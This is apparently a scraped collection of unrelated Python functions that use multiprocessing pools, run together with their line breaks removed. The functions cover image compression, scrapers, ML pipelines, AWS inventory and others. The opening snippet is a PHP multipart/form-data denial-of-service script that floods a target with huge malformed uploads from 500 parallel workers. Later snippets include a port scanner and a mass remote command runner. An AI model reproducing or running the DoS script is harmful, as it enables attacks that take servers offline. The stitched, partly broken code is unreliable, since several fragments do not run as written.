def main(): parser = OptionParser() parser.add_option("-t", "--target", action="store", dest="target", default=False, type="string", help="test target") (options, args) = parser.parse_args() target = options.target Num=350000 headers={'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryX3B7rDMPcQlzmJE1', 'Accept-Encoding':'gzip, deflate', 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'} body = "------WebKitFormBoundaryX3B7rDMPcQlzmJE1\nContent-Disposition: form-data; name=\"file\"; filename=sp.jpg" payload="" for i in range(0,Num): payload = payload + "a\n" body = body + payload; body = body + "Content-Type: application/octet-stream\r\n\r\ndatadata\r\n------WebKitFormBoundaryX3B7rDMPcQlzmJE1--" print "starting..."; Getting_list() pool = Pool(500) for ip in IP_Port: pool.apply_async(check_php_multipartform_dos, [target,body,headers,ip]) pool.close() pool.join()
def main(): global output_doc_path if output_doc_path == '': output_doc_path = os.path.join(os.path.split(input_doc_path)[0], 'outputTinypng') if not os.path.exists(output_doc_path): os.mkdir(output_doc_path) for parent,dirnames,filenames in os.walk(input_doc_path): #三个参数:分别返回1.父目录 2.所有文件夹名字(不含路径) 3.所有文件名字 for dirname in dirnames: #输出文件夹信息 # print("parent is:" + parent) # print("dirname is" + dirname) outDir = os.path.join(output_doc_path,os.path.relpath(os.path.join(parent,dirname),input_doc_path)) if not os.path.exists(outDir): os.mkdir(outDir) for filename in filenames: #输出文件信息 # print("parent is:" + parent) # print("filename is:" + filename) filePaths.append(os.path.join(parent,filename)) pngFilePaths = filter(lambda x:os.path.splitext(x)[1]=='.png' or os.path.splitext(x)[1]=='.jpg',filePaths) print('Parent process %s.' % os.getpid()) p = Pool(poolLimite) for fileName in pngFilePaths: p.apply_async(getTinyPng, args=(fileName,)) print('Waiting for all subprocesses done...') p.close() p.join() print('All subprocesses done.')
def main(): if MAIL_TO: signal.signal(signal.SIGALRM, send_email_by_alarm) signal.alarm(TIME_NOTIFICATION_BY_EMAIL) send_email_start() start_time = int(time.time()) manager = Manager() queue = manager.Queue() pool = Pool(PROCESS_NUMBER + 1) jobs = [] pool.apply_async(listener, args=(queue,)) for config_file in FINAL_CONFIG_TO_SCRAPE: job = pool.apply_async(scraper, (config_file, queue)) jobs.append(job) for i, job in enumerate(jobs): job.get() # although all job finished, but for unknown some providers still running time.sleep(10) #extend more time to make sure there is not any provider running for i in range(1000): if len(get_summary().provider_running) > 0: time.sleep(500) else: break print "Run all has finished" queue.put(LISTENER_KILL_SIGNAL) pool.close() if MAIL_TO: send_email_end()
def _send_requests(self, total_requests, path='', other=False): url = 'http://{0}:{1}/{2}'.format(self.traffic_server_host, self.traffic_server_port, path) url2 = 'http://{0}:{1}/other/{2}'.format(self.traffic_server_host, self.traffic_server_port, path) jobs = [] jobs2 = [] pool = Pool(processes=4) for _ in xrange(0, total_requests): jobs.append(pool.apply_async(requests.get, (url,))) if other: jobs2.append(pool.apply_async(requests.get, (url2,))) results = [] results2 = [] for j in jobs: try: results.append(j.get()) except Exception as e: results.append(e) for j in jobs2: try: results2.append(j.get()) except Exception as e: results2.append(e) return results, results2
def getData(): if os.path.isfile("chat_urls.p"): chat_urls = pickle.load( open( "chat_urls.p", "rb" ) ) else: chat_urls = {} for user in users: chat_urls[user] = get_urls(user) teams_url = "http://espn.go.com/mlb/teams" pickle.dump( chat_urls, open( "chat_urls.p", "wb" ) ) # for user in chat_urls: # urls = chat_urls[user] # for url in urls: # getLog(url) logDB = {} for user in chat_urls: logDB[user] = {} p = Pool(20) i=0 manager = Manager() db = manager.dict() for user in chat_urls: for url in chat_urls[user]: i+=1 p.apply_async(addLogData, args=(url,db)) p.close() p.join() out = db._getvalue() outfile = open("rawChat.txt","wb") for url in out: outfile.write(out[url]+"\n")
def multi_remote_exec_cmd(hosts, username, cmd): pool = Pool(processes=5) for host in hosts: username, password, ip, port = get_connect_item(username, host) pool.apply_async(remote_exec_cmd, (ip, port, username, password, cmd)) pool.close() pool.join()
def dirImgProcess(path): global workerPool, workerOutput, theGreatIndex workerPool = Pool() workerOutput = [] work = [] theGreatIndex = {} pagenumber = 0 for (dirpath, dirnames, filenames) in os.walk(path): for afile in filenames: if getImageFileName(afile) is not None: pagenumber += 1 work.append([afile, dirpath, options]) if GUI: GUI.progressBarTick.emit(str(pagenumber)) if len(work) > 0: for i in work: workerPool.apply_async(func=fileImgProcess, args=(i, ), callback=fileImgProcess_tick) workerPool.close() workerPool.join() if GUI and not GUI.conversionAlive: rmtree(os.path.join(path, '..', '..'), True) raise UserWarning("Conversion interrupted.") if len(workerOutput) > 0: rmtree(os.path.join(path, '..', '..'), True) raise RuntimeError("One of workers crashed. Cause: " + workerOutput[0]) else: rmtree(os.path.join(path, '..', '..'), True) raise UserWarning("Source directory is empty.")
def run_make_submission(settings, targets_and_pipelines, split_ratio): pool = Pool(settings.N_jobs) for i, (target, pipeline, feature_masks, classifier, classifier_name) in enumerate(targets_and_pipelines): for j, feature_mask in enumerate(feature_masks): progress_str = 'T=%d/%d M=%d/%d' % (i+1, len(targets_and_pipelines), j+1, len(feature_masks)) pool.apply_async(make_submission_predictions, [settings, target, pipeline, classifier, classifier_name], {'feature_mask': feature_mask, 'progress_str': progress_str, 'quiet': True}) pool.close() pool.join() guesses = ['clip,preictal'] num_masks = None classifier_names = [] for target, pipeline, feature_masks, classifier, classifier_name in targets_and_pipelines: classifier_names.append(classifier_name) if num_masks is None: num_masks = len(feature_masks) else: assert num_masks == len(feature_masks) test_predictions = [] for feature_mask in feature_masks: data = make_submission_predictions(settings, target, pipeline, classifier, classifier_name, feature_mask=feature_mask) test_predictions.append(data.mean_predictions) predictions = np.mean(test_predictions, axis=0) guesses += make_csv_for_target_predictions(target, predictions) output = '\n'.join(guesses) write_submission_file(settings, output, 'ensemble n=%d split_ratio=%s' % (num_masks, split_ratio), None, str(classifier_names), targets_and_pipelines)
def _run(self, source, destination_format, clear_source=False, workers=-1): """ parallel version of the `convert` method :param source: (rdf) files to convert (source path) :param destination_format: the destination format :param clear_source: if set, delete the source files. Default = False :return: None """ files = [] src = os.path.abspath(source) if os.path.isdir(src): files = [os.path.join(src, f) for f in os.listdir(src) if to_process(f, destination_format)] elif os.path.exists(src): files = [src] self._log.info('to process: {0}'.format(files)) if clear_source: self._log.warn('will remove original files after conversion') def job_finished(res): print '.', sys.stdout.flush() num_cpus = cpu_count() num_workers = workers if 0 < workers < num_cpus else num_cpus pool = Pool(processes=num_workers) for src in files: dst = dest_file_name(src, destination_format) if dst: pool.apply_async(convert_file, (src, dst, clear_source), callback=job_finished) pool.close() pool.join()
def get_fractional_errors(R_star, L_star, P_c, T_c): """ Pass in "guess" conditions. Will then calculate inward and outward errors, Returns: [Data array] dY - over/undershoots (+/-, going outward) [dx handled outside this] """ # R_star, L_star, P_c, T_c = x P_c_0 = modelparameters.P_c # core pressure, [dyne cm^-2] T_c_0 = modelparameters.T_c # core temperature, [K] R_star_0 = modelparameters.R_star L_star_0 = modelparameters.L_star print "" print "R: " + str(R_star / R_star_0) print "L: " + str(L_star / L_star_0) print "P: " + str(P_c / P_c_0) print "T: " + str(T_c / T_c_0) X = modelparameters.X Y = modelparameters.Y Z = modelparameters.Z mu = modelparameters.mu params = (X, Y, Z, mu) M_star = modelparameters.M_star m_fitting_point = modelparameters.m_fitting_point pool = Pool(2) outward_results = pool.apply_async(integrate.integrate_outwards, [M_star, m_fitting_point, P_c, T_c, mu, X, Y, Z] ) inward_results = pool.apply_async(integrate.integrate_inwards, [M_star, m_fitting_point, R_star, L_star, mu, X, Y, Z] ) m_outward, y_outward, infodict_outward = outward_results.get() m_inward, y_inward, infodict_inward = inward_results.get() dr = y_inward[-1,0] - y_outward[-1,0] dl = y_inward[-1,1] - y_outward[-1,1] dP = y_inward[-1,2] - y_outward[-1,2] dT = y_inward[-1,3] - y_outward[-1,3] dY = np.array([dr, dl, dP, dT]) print '' print 'fractional errors:' print "dR: " + str(dr / y_inward[-1,0]) print "dL: " + str(dl / y_inward[-1,1]) print "dP: " + str(dP / y_inward[-1,2]) print "dT: " + str(dT / y_inward[-1,3]) return dY
class MultiProcessScheduler(LocalScheduler): def __init__(self, threads): LocalScheduler.__init__(self) self.threads = threads self.tasks = {} from multiprocessing import Pool self.pool = Pool(self.threads or 2) def start(self): pass def submitTasks(self, tasks): def callback(args): logger.debug("got answer: %s", args) tid, reason, result, update = args task = self.tasks.pop(tid) self.taskEnded(task, reason, result, update) for task in tasks: logger.debug("put task async: %s", task) self.tasks[task.id] = task self.pool.apply_async(run_task_in_process, [task, self.nextAttempId(), env.environ], callback=callback) def stop(self): self.pool.terminate() self.pool.join() logger.debug("process pool stopped")
def averageSimilarityMatrix(dictOfClassesLocal, dictOfWeightsLocal,title="Cluster similarity matrix",savePlot=False): global bar, progressCount, dictOfClasses, dictOfWeights, arguments, distances dictOfClasses = dictOfClassesLocal dictOfWeights = dictOfWeightsLocal print "Computing similarity matrix..." bar = progressbar.ProgressBar(maxval=len(dictOfClasses.keys())**2, widgets=[progressbar.Bar('=', '[', ']'), ' ', progressbar.Percentage()]) bar.start() progressCount = 0 # Initialise task matrix arguments = [] distances = [] for i,k in zip(range(len(dictOfClasses.keys())),reversed(sorted(dictOfClasses.keys()))): arguments.append([]) distances.append([]) for j in sorted(dictOfClasses.keys()): arguments[i].append((dictOfClasses[k],dictOfClasses[j],dictOfWeights[k],dictOfWeights[j])) distances[i].append([]) # Distribute tasks poo = Pool() for i in range(len(dictOfClasses.keys())**2): poo.apply_async(interClassDistance,(i,),callback=updateResultMatrix) poo.close() poo.join() bar.finish() plot.plotSimilarityMatrix(distances,sorted(dictOfClasses.keys()),title,savePlot)
def get_classify(): classify = {"type1": "美食", "type2": "休闲娱乐", "type4-sub_type1": "酒店", "type5": "购物", "type6": "办卡送礼", "type7": "旅游", "type9": "汽车", "type10": "时尚丽人", "type11": "生活服务", "type4-sub_type2": "出行", "type4-sub_type3": "出行"} for name in classify: total_num_of_page = get_num_of_page('http://www.rong360.com/credit/f-youhui-' + name) print classify[name] + ": " + str(total_num_of_page) thread_num = 20 # num of process section_size = 50 section = total_num_of_page / section_size if total_num_of_page % section_size > 0: section += 1 for k in range(section): begin = k * section_size + 1 end = begin + section_size - 1 end = min(end, total_num_of_page) print "start to get summary pages from " + str(begin) + " to " + str(end) + \ ", each summary page contains 20 detail content pages." manager = multiprocessing.Manager() queue = manager.Queue() # a queue storing index of url queue.put(begin - 1) # Initialization of url index page_queue = manager.Queue() # a queue storing end of urls # start multiprocess to get urls pool = Pool(thread_num) for i in range(thread_num): pool.apply_async(get_page_url, args=(queue, end, page_queue, '-' + name)) pool.close() pool.join() print 'num of total pages: ' + str(page_queue.qsize()) store_data.insert_column("classify", classify[name], page_queue)
def get_answer(self,question,ques_ans,mode): ''' get the best answer in the database param@ question: target question param@ ques_ans: list of question-answers in the database, [[pos1,q1,a1],[pos2,q2,a2]] param@ mode: a tuple of a similarity algorithm name and threshold, eg: ('TFIDF',0.8) return: the answer with the largest similarity >= threshold ''' MODE = ['TFIDF',''] if mode[0] not in MODE: # cheack if mode is avaiable print ('no such mode: %s.') %mode return None if mode[0] == 'TFIDF': pool = Pool(5) # create a process pool manager = multiprocessing.Manager() queue = manager.Queue() lock = manager.Lock() M = len(self.__words) for ques in ques_ans: pool.apply_async(tfidf,args=(question,ques,M,queue,lock)) pool.close() pool.join() # get all elements in the queue, element (question,similarity) answer = [] while not queue.empty(): answer.append(queue.get()) sorted_ans = sorted(answer,key = lambda x : x[1],reverse=True) # get the answers which similarity > threshold ans = [element[0][2] for element in sorted_ans, if element[1] >= threshold] return ans[0]
def handle(self, *args, **options): pool = Pool(settings.NUM_THREADS) conf = settings.TRAINER_CURRENCY_CONFIG['supervised_nn'] print("Starting V2 run") for ticker in conf['ticker']: for hidden_layers in conf['hidden_layers']: for min_back in conf['min_back']: for epochs in conf['epochs']: for granularity in conf['granularity']: for datasetinputs in conf['datasetinputs']: for bias in conf['bias']: for momentum in conf['momentum']: for learningrate in conf['learningrate']: for weightdecay in conf['weightdecay']: for recurrent in conf['recurrent']: for timedelta_back_in_granularity_increments in \ conf['timedelta_back_in_granularity_increments']: pool.apply_async(do_prediction_test, args=( ticker, hidden_layers, min_back, epochs, granularity, datasetinputs, learningrate, bias, momentum, recurrent, weightdecay, timedelta_back_in_granularity_increments )) print("All V2 jobs queued") pool.close() pool.join() print("V2 run complete")
def main(): if len(sys.argv) != 3: print 'Usage: {} <file> <save_dir>'.format(sys.argv[0]) sys.exit(1) csv_file, save_dir = sys.argv[1], sys.argv[2] frame = pandas.read_csv(csv_file, sep='\t', header=None) counters = map(Counter, [frame[i] for i in range(len(frame.columns))]) pool = Pool() for i in range(len(counters)): for j in range(len(counters)): nr_keys = len(counters[i]) * len(counters[j]) if len(counters[i]) > 200 or len(counters[i]) > 200 or nr_keys > 200 * 200: print 'too many keys columns `{},{}\': {}'.format( i, j, nr_keys) else: print 'columns `{},{}\' passed'.format(i, j) pool.apply_async(do_main, [ csv_file, frame, i, j, os.path.join( save_dir, '{}-{}.png'.format(i, j))]) pool.close() pool.join() pool.terminate()
def recursive_download_dir(seed, depth, dir, root): if not os.path.exists(root): os.mkdir(root); f = urllib.urlopen(seed+dir); text = f.read(); parser = CaidaParser(); parser.feed(text); p = Pool(5); for e in parser.file: for i in range(depth): print "--", print e; p.apply_async(download, args=(dir, e, seed+dir+e, root, )); #download(dir, e, seed+dir+e, root); p.close(); p.join(); for e in parser.dir: for i in range(depth): print "--", print e; if not os.path.exists(root+e): os.mkdir(root+dir+e); recursive_download_dir(seed, depth+1, dir+e, root)
def main(): # fileNames = [x for x in os.listdir(input_doc_path) if os.path.splitext(x)[1]=='.png'] # absFileNames = list(map(absFilePath, fileNames)) os.system('input doc path "%s"'%input_doc_path) absFilesPath(input_doc_path) # print('****** %s ' % absFileNames) global output_doc_path if output_doc_path == '': output_doc_path = os.path.join(input_doc_path, 'tinypng') # if not os.path.exists(output_doc_path): # os.mkdir(output_doc_path) # print(input_doc_path) # print(absFileNames) print('Parent process %s.' % os.getpid()) p = Pool(poolLimite) for fileName in absFileNames: p.apply_async(getTinyPng, args=(fileName,)) print('Waiting for all subprocesses done...') p.close() p.join() print('All subprocesses done.')
def _generate(self, **kwargs): uni_key = 'University' uni_ext = '.nt' get_uni_id = lambda uni_file: int(uni_file.replace(uni_key, '').replace(uni_ext, '').strip()) universities_rdf = { get_uni_id(f): os.path.join(self.output_path, f) for f in os.listdir(self.output_path) if f.startswith(uni_key) } pool = Pool(processes=self.num_workers) for uni_id, uni_rdf in universities_rdf.iteritems(): pool.apply_async(self.distributor(uni_id, uni_rdf), kwds=self._distributor_kwargs(uni_id, uni_rdf)) pool.close() pool.join() # concat files site_files = lambda site_id: re.findall(r'site_{0}_uni_[0-9]+\.nt'.format(site_id), ' '.join(os.listdir(self._output_path))) for site in xrange(self.num_sites): site_parts = site_files(site) logger.info('[site = %s] site file parts = %s', site, site_parts) with io.open(self.site_path(site), 'w+') as SITE: for spart in site_parts: spart_file = os.path.join(self._output_path, spart) with io.open(spart_file, 'r+') as SPART: SITE.write(SPART.read()) sh.rm(spart_file)
def run_bam(self): anno = self.anno #pdb.set_trace() if os.path.exists(self.out_path + "/" + self.sample.split(".bam")[0]): print "File exists. Skipping..." return print self.sample chrs_tbp = os.listdir(anno) tmp_path = tempfile.mkdtemp(suffix=os.path.basename(anno)) pool = Pool(processes=6) #bam = pysam.Samfile(self.sample, 'rb') for chr_tbp in chrs_tbp: #print chr_tbp #self.tab_bam(anno, self.sample, chr_tbp, tmp_path, self.fun, exp) #pool.apply_async(tab_bam, (anno, self.sample, chr_tbp, tmp_path, self.fun, exp)) pool.apply_async(tab_bam, (self, chr_tbp, tmp_path)) #tab_bam(self, chr_tbp, tmp_path) pool.close() pool.join() #pdb.set_trace() if self.flank == 0: self.file_combine(tmp_path, os.path.basename(self.sample).split(".bam")[0]) else: self.file_combine(tmp_path, os.path.basename(self.sample).split(".bam")[0] + "_flank" + str(self.flank))
def loop(self, argv = sys.argv): # Parse arguments self.parse(argv) # Check for help option if self.isParameter('info'): self.info() return # Call start function self.start() # Number of processors nproc = int(self.getParameter('nproc', '1')) # Run in multiprocessing is requested if nproc > 1: # Creates the log directory is needed if not os.path.exists('%s/logs' % Common.NeatDirectory): os.makedirs('%s/logs' % Common.NeatDirectory) # Create a pool of workers pool = Pool(processes = nproc) try: # Loop over the channels for set in self.__loopsets: pool.apply_async(self.wrapper, (set,)) time.sleep(1) pool.close(); pool.join() except KeyboardInterrupt: pool.terminate(); pool.join() else: # Run the process with multiprocessing for set in self.__loopsets: self.process(set) # Call end function self.end()
def pollswitches(switch_ips): """poll switch.""" poll_switch_ips = [] with database.session(): poll_switch_ips = util.update_switch_ips(switch_ips) if flags.OPTIONS.async: for poll_switch_ip in poll_switch_ips: celery.send_task( 'compass.tasks.pollswitch', (poll_switch_ip,) ) else: try: pool = Pool(processes=int(flags.OPTIONS.thread_pool_size)) for poll_switch_ip in poll_switch_ips: pool.apply_async( poll_switch.poll_switch, (poll_switch_ip,) ) pool.close() pool.join() except Exception as error: logging.error('failed to poll switches %s', poll_switch_ips) logging.exception(error)
class MultiProcessScheduler(LocalScheduler): def __init__(self, threads): LocalScheduler.__init__(self) self.threads = threads self.tasks = {} from multiprocessing import Pool self.pool = Pool(self.threads or 2) def start(self): pass def submitTasks(self, tasks): total, self.finished = len(tasks), 0 def callback(args): logger.debug("got answer: %s", args) tid, reason, result, update = args task = self.tasks.pop(tid) self.finished += 1 logger.info("Task %s finished (%d/%d) \x1b[1A", tid, self.finished, total) if self.finished == total: logger.info("\r" + " "*80 + "\x1b[1A") # erase the progress bar self.taskEnded(task, reason, result, update) for task in tasks: logger.debug("put task async: %s", task) self.tasks[task.id] = task self.pool.apply_async(run_task_in_process, [task, self.nextAttempId(), env.environ], callback=callback) def stop(self): self.pool.terminate() self.pool.join() logger.debug("process pool stopped")
def evaluate_fitness(individuals, grammar, fitness, ave, mats, generation, MATERIALS_FILE, LOAD, FITNESSES, DEBUG = False, MULTI_CORE = True, PRINT = False): """Perform the mapping and evaluate each individual across multiple available cores""" if MULTI_CORE: cores = cpu_count() # use all available cores pool = Pool(processes=cores) for name, ind in enumerate(individuals): bind = (name, fitness, ind, grammar, ave, mats, generation, LOAD, MATERIALS_FILE, FITNESSES, DEBUG, PRINT) # Perform the mapping for each individual pool.apply_async(parallelize_indivs, args = (bind, ), callback = ind.save_result) pool.close() pool.join() else: for name, ind in enumerate(individuals): bind = (name, fitness, ind, grammar, ave, mats, generation, LOAD, MATERIALS_FILE, FITNESSES, DEBUG, PRINT) parallelize_indivs(bind) counter = 0 pounder = 0 for ind in individuals: if ind.phenotype == None: bind = (1, fitness, ind, grammar, ave, mats, generation, LOAD, MATERIALS_FILE, FITNESSES, DEBUG, PRINT) parallelize_indivs(bind) if ind.phenotype == None: counter += 1 if ind.good == True: pounder += 1 if counter: print "Number of individuals with no phenotype:",counter
def main(): search_dir = sys.argv[1] assert(os.path.isdir(search_dir)) files_to_convert = [] for directory_root, directory, filenames in os.walk(search_dir): for filename in filenames: full_filename = os.path.join(directory_root,filename) if full_filename.endswith('.entities.gz'): files_to_convert.append(full_filename) if full_filename.endswith('.generations.gz'): files_to_convert.append(full_filename) print 'Found %d files to convert' % len(files_to_convert) r = library.Reporter('converting files') r.set_total_count(len(files_to_convert)) pool = Pool() for f in files_to_convert: pool.apply_async(convert_file, args=(f,), callback=r.increment_report_callback) pool.close() pool.join() r.done()
def test(): pool = Pool(len(ip_list)) for ip in ip_list: pool.apply_async(start_collect, (ip, '/letv/crawler_delta', './test_in')) print 'waiting for all file collector to finish...' pool.close() pool.join()
def test_run(force=False): if not args.test_run and not force: return if not os.path.exists(dir_test): os.mkdir(dir_test) number_device = len(devices) if number_device < 1: error('Please ensure test device is connected') # Build test if args.test_drybuild: results = {} for command in test_suite: results[command] = [] for suite in test_suite[command]: results[command].append('PASS') else: results = test_build(force=True) pool = Pool(processes=number_device) for index, device in enumerate(devices): pool.apply_async(_test_run_device, (index, results)) pool.close() pool.join()
def run(wait=0): """Starts the scrapping proccess. creates a process per week per year given in pages """ logger = makeLogger('main', r'./logs_RotoFDStats/') startTime = datetime.now() logger.debug('start time: ' + str(startTime)) logger.debug('waiting %d seconds', wait) time.sleep(wait) logger.debug('starting') pool = Pool(processes=int(get_proxy_count()/2)) pages = [(2011, 17), (2012, 17), (2013, 17), (2014, 17), (2015, 17)] for year, maxWeek in pages: for week in range(1, maxWeek+1): #parseWeek(year, week) pool.apply_async(parseWeek,(year, week,)) pool.close() #Prevents any more tasks from being submitted to the pool. Once all the tasks have been completed the worker processes will exit. pool.join() #Wait for the worker processes to exit. One must call close() or terminate() before using join(). logger.debug('run time: ' + str(datetime.now()-startTime )) closeLogger('main')
def runPortScan(self, ips, threads, allports=''): results = [] rep = re.match(r'(\w+)-(\w+)', allports) if rep: left = int(rep.group(1)) right = int(rep.group(2)) + 1 ports = xrange(left, right) else: if allports != '': allports = allports else: allports = self.default_port ports = allports.replace(' ', '').split(',') for ip in ips: pool = Pool(threads) for port in ports: pool.apply_async(func=self.simpleScan, args=(ip, str(port)), callback=self.callback) pool.close() pool.join() # print '' ipport = {} ipport['ip'] = ip ipport['port'] = self.openport results.append(ipport) self.openport = '' self.first = 0 return results
def main(num): """ 主函数 """ with open('./log/getynpic.log','wb+') as logfile: logfile.truncate() with open('./log/ynfailedurl.log','wb+') as logfile: logfile.truncate() otherpattern=re.compile(r'\n|\s',re.S) njfile=open('./ynalltiles','r') alllines=njfile.readlines() everyline=len(alllines)/num+1 p = Pool(processes=num) for num in xrange(0,num): partlines=alllines[num*everyline:(num+1)*everyline] p.apply_async(oneprocess,args=(partlines,)) p.close() p.join() njfile.close() with open('./log/getynpic.log','r') as logfile: for oneline in logfile.readlines(): oneinfo=re.sub(otherpattern,'',oneline) if oneinfo != '': infolist=oneinfo.split(',') getimage(infolist[0],infolist[1]) with open('./log/ynfailedurl.log','r') as logfile: for oneline in logfile.readlines(): lineinfo=re.sub(otherpattern,'',oneline) if lineinfo != '': gotourl(lineinfo)
def make_lmdb_from_imgs(data_path, lmdb_path, img_path_list, keys, batch=5000, compress_level=1, multiprocessing_read=False, n_thread=40, map_size=None): """Make lmdb from images. Contents of lmdb. The file structure is: example.lmdb ├── data.mdb ├── lock.mdb ├── meta_info.txt The data.mdb and lock.mdb are standard lmdb files and you can refer to https://lmdb.readthedocs.io/en/release/ for more details. The meta_info.txt is a specified txt file to record the meta information of our datasets. It will be automatically created when preparing datasets by our provided dataset tools. Each line in the txt file records 1)image name (with extension), 2)image shape, and 3)compression level, separated by a white space. For example, the meta information could be: `000_00000000.png (720,1280,3) 1`, which means: 1) image name (with extension): 000_00000000.png; 2) image shape: (720,1280,3); 3) compression level: 1 We use the image name without extension as the lmdb key. If `multiprocessing_read` is True, it will read all the images to memory using multiprocessing. Thus, your server needs to have enough memory. Args: data_path (str): Data path for reading images. lmdb_path (str): Lmdb save path. img_path_list (str): Image path list. keys (str): Used for lmdb keys. batch (int): After processing batch images, lmdb commits. Default: 5000. compress_level (int): Compress level when encoding images. Default: 1. multiprocessing_read (bool): Whether use multiprocessing to read all the images to memory. Default: False. n_thread (int): For multiprocessing. map_size (int | None): Map size for lmdb env. If None, use the estimated size from images. Default: None """ assert len(img_path_list) == len(keys), ( 'img_path_list and keys should have the same length, ' f'but got {len(img_path_list)} and {len(keys)}') print(f'Create lmdb for {data_path}, save to {lmdb_path}...') print(f'Totoal images: {len(img_path_list)}') if not lmdb_path.endswith('.lmdb'): raise ValueError("lmdb_path must end with '.lmdb'.") if osp.exists(lmdb_path): print(f'Folder {lmdb_path} already exists. Exit.') sys.exit(1) if multiprocessing_read: # read all the images to memory (multiprocessing) dataset = {} # use dict to keep the order for multiprocessing shapes = {} print(f'Read images with multiprocessing, #thread: {n_thread} ...') pbar = tqdm(total=len(img_path_list), unit='image') def callback(arg): """get the image data and update pbar.""" key, dataset[key], shapes[key] = arg pbar.update(1) pbar.set_description(f'Read {key}') pool = Pool(n_thread) for path, key in zip(img_path_list, keys): pool.apply_async(read_img_worker, args=(osp.join(data_path, path), key, compress_level), callback=callback) pool.close() pool.join() pbar.close() print(f'Finish reading {len(img_path_list)} images.') # create lmdb environment if map_size is None: # obtain data size for one image img = cv2.imread(osp.join(data_path, img_path_list[0]), cv2.IMREAD_UNCHANGED) _, img_byte = cv2.imencode( '.png', img, [cv2.IMWRITE_PNG_COMPRESSION, compress_level]) data_size_per_img = img_byte.nbytes print('Data size per image is: ', data_size_per_img) data_size = data_size_per_img * len(img_path_list) map_size = data_size * 10 env = lmdb.open(lmdb_path, map_size=map_size) # write data to lmdb pbar = tqdm(total=len(img_path_list), unit='chunk') txn = env.begin(write=True) txt_file = open(osp.join(lmdb_path, 'meta_info.txt'), 'w') for idx, (path, key) in enumerate(zip(img_path_list, keys)): pbar.update(1) pbar.set_description(f'Write {key}') key_byte = key.encode('ascii') if multiprocessing_read: img_byte = dataset[key] h, w, c = shapes[key] else: _, img_byte, img_shape = read_img_worker(osp.join(data_path, path), key, compress_level) h, w, c = img_shape txn.put(key_byte, img_byte) # write meta information txt_file.write(f'{key}.png ({h},{w},{c}) {compress_level}\n') if idx % batch == 0: txn.commit() txn = env.begin(write=True) pbar.close() txn.commit() env.close() txt_file.close() print('\nFinish writing lmdb.')
def connection_cache(connection): logger.write("Processing {0} -> {1} @ {2}".format(connection["start"], connection["end"], connection["starttime"])) connectiondb = ConnectionPrices(db, connection["id"], r) connectiondb.getAggregatedData( ) #we don't need the result, but the function refreshed the cache #track cache function def track_cache(track): logger.write("Processing {0} -> {1}".format(track["start"], track["end"])) trackdb = TrackPrices(db, track, r) trackdb.getAggregatedData( ) #we don't need the result, but the function refreshed the cache while True: #Pool worker pool = Pool(4) #cache connections for connection in db.table('bahn_monitoring_connections').where( 'active', '1').get(): pool.apply_async(connection_cache, (connection, )) #cache tracks for track in db.table('bahn_monitoring_connections').where( 'active', '1').distinct().get(): pool.apply_async(track_cache, (track, )) pool.close() pool.join()
def main(): ''' main method ''' if len(sys.argv) < 2: usage() config_uri = sys.argv[1] options = parse_vars(sys.argv[2:]) setup_logging(config_uri) global log log = logging.getLogger(__name__) global settings settings = get_appsettings(config_uri, options=options) engine = engine_from_config(settings, 'sqlalchemy.') DBSession.configure(bind=engine) global creds_file creds_file = settings['creds.dir'] + "/creds.yaml" # global to enable us to handle KeyboardInterrupts without leaving zombies # around. global pool pool = Pool(processes=cpu_count() * 2) objects = [] pids = [] for account in get_accounts(): access_key, secret_key = get_creds(account) regions = boto.ec2.regions() for region in regions: # skip restricted access regions if region.name in ['us-gov-west-1', 'cn-north-1']: continue log.debug('checking %s: %s', account, region.name) ec2 = boto.ec2.connect_to_region(region.name, aws_access_key_id=access_key, aws_secret_access_key=secret_key) run1 = pool.apply_async(update_instance_inventory, (ec2, account), callback=objects.extend) run2 = pool.apply_async(update_reservation_inventory, (ec2, account), callback=objects.extend) pids.append(run1) pids.append(run2) # get the output of all our processes for pid in pids: pid.get() del pids[:] # ensure the sqlalchemy objects aren't garbage-collected before we commit # them. # see: http://docs.sqlalchemy.org/en/latest/orm/session_state_management.html#session-referencing-behavior merged = [] for col, kwargs, defaults in objects: obj = insert_or_update(DBSession, col, defaults=defaults, **kwargs) merged.append(DBSession.merge(obj)) try: transaction.commit() except IntegrityError as exc: DBSession.rollback() log.error(exc) pool.close() pool.join() expire_instances() #TODO: enable passing in threshold value prune_instances() prune_reservations()
newMysqlConn = mysqlConn('bilibili') resultFlag = newMysqlConn.insert('insert into user_copy1 (id,name,sex,face,sign,level,birthday,coins,following,follower) values (%s, %s,%s,%s,%s,%s,%s,%s,%s,%s)',[userData['id'],userData['name'],userData['sex'],userData['face'],userData['sign'],userData['level'],userData['birthday'],userData['coins'],userData['following'],userData['follower']]) except: pass if __name__=='__main__': # 父进程创建Queue,并传给各个子进程: # q = Queue() # pw = Process(target=write, args=(q,)) # # pr = Process(target=read, args=(q,)) # # 启动子进程pw,写入: # print(time.ctime(time.time()) ) # pw.start() # # 启动子进程pr,读取: # # pr.start() # # 等待pw结束: # pw.join() # print(time.ctime(time.time()) ) # # pr进程里是死循环,无法等待其结束,只能强行终止: # pr.terminate() p = Pool(12) print(time.ctime(time.time()) ) i=1 while True: p.apply_async(write, args=(i,)) i = i+1 p.close() p.join() print(time.ctime(time.time()) )
if __name__ == "__main__": # %% manager = mp.Manager() aggreateData = manager.dict() start = time.time() day_second = 86400 # week_second = 7*day_second start_list = np.arange(1162393768, 1178747998 + day_second, day_second) epoch_length = 30 # start_list = start_list[:3] output = open('dict_list3_1.pkl', 'wb') # %% results = [] p = Pool(16) for start_point in start_list: # print('assign\t',str(start_point)) result = p.apply_async(func=compute, args=(start_point, )) results.append(result) p.close() p.join() output_list = [] for result in results: output_list.append(result.get()) print('compute_time:', time.time() - start) pickle.dump(output_list, output) output.close()
